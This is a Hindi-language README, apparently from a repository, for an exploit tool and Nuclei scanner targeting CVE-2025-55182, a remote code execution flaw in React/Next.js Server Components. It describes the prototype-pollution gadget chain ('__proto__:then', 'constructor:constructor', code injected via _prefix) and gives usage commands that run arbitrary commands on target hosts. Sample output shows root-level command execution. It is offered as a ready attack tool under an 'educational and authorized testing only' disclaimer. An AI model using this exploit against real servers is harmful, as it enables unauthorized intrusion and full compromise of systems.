
CVE-2025-55182 - React सर्वर घटक RCE शोषण और स्कैनर बाहरी सर्वर और CLI इंटरफ़ेस का समर्थन करता है
React/Next.js सर्वर एक्शन में CVE-2025-55182 के लिए पूर्ण-सुविधाओं वाला रिमोट कोड निष्पादन एक्सप्लॉइट और स्कैनर।
मूल PoC: Spritualkb/CVE-2025-55182-exp
CVE-2025-55182 React सर्वर कम्पोनेंट्स में एक गंभीर प्रोटोटाइप प्रदूषण भेद्यता है जो रिमोट कोड निष्पादन की अनुमति देती है। यह रिपॉजिटरी स्वचालित स्कैनिंग (Nuclei टेम्पलेट) और मैन्युअल शोषण (Python स्क्रिप्ट) दोनों टूल प्रदान करती है।
भेद्यता तंत्र:
यह एक्सप्लॉइट React फ्लाइट प्रोटोकॉल डिसीरियलाइज़ेशन में प्रोटोटाइप प्रदूषण का लाभ उठाता है। यह "$1:__proto__:then" के माध्यम से Object.prototype.then को प्रदूषित करता है और _formData.get को "$1:constructor:constructor" पर सेट करके Function कंस्ट्रक्टर तक पहुँच प्राप्त करता है, फिर _prefix के माध्यम से दुर्भावनापूर्ण कोड इंजेक्ट करता है जो Function() द्वारा निष्पादित होता है।
cve-2025-55182.yaml)स्वचालित भेद्यता स्कैनर जो id कमांड निष्पादित करता है और X-Action-Redirect हेडर के माध्यम से आउटपुट प्राप्त करता है।
उपयोग:
nuclei -u http://target.com:3000 -t cve-2025-55182.yaml
विशेषताएँ:
id) निष्पादित करता हैCVE-2025-55182.py)पूर्ण-सुविधाओं वाली RCE एक्सप्लॉइट स्क्रिप्ट जो मनमानी कमांड निष्पादित करती है और आउटपुट प्राप्त करती है।
उपयोग:
python3 CVE-2025-55182.py http://target.com:3000 -c "id"
python3 CVE-2025-55182.py https://target.com -c "whoami" --no-check-ssl
python3 CVE-2025-55182.py 192.168.1.100:3000 -c "uname -a"
विशेषताएँ:
X-Action-Redirect हेडर से स्वचालित आउटपुट निष्कर्षण$ nuclei -u http://localhost:3001 -t cve-2025-55182.yaml
[cve-2025-55182:command_output] [http] [critical] http://localhost:3001 ["uid=0(root) gid=0(root) groups=0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel),11(floppy),20(dialout),26(tape),27(video)"]
[INF] Scan completed in 28.35483ms. 1 matches found.
$ python3 CVE-2025-55182.py http://localhost:3001 -c "id"
============================================================
CVE-2025-55182 RCE Exploit
React Server Components Remote Code Execution
============================================================
[*] Target: http://localhost:3001
[*] Command: id
[*] Building payload...
[*] Sending exploit payload...
============================================================
[+] Command executed successfully!
============================================================
[+] Command Output:
------------------------------------------------------------
uid=0(root) gid=0(root) groups=0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel),11(floppy),20(dialout),26(tape),27(video)
------------------------------------------------------------
============================================================
[*] Exploitation attempt completed
============================================================
केवल शैक्षिक और अधिकृत परीक्षण उद्देश्यों के लिए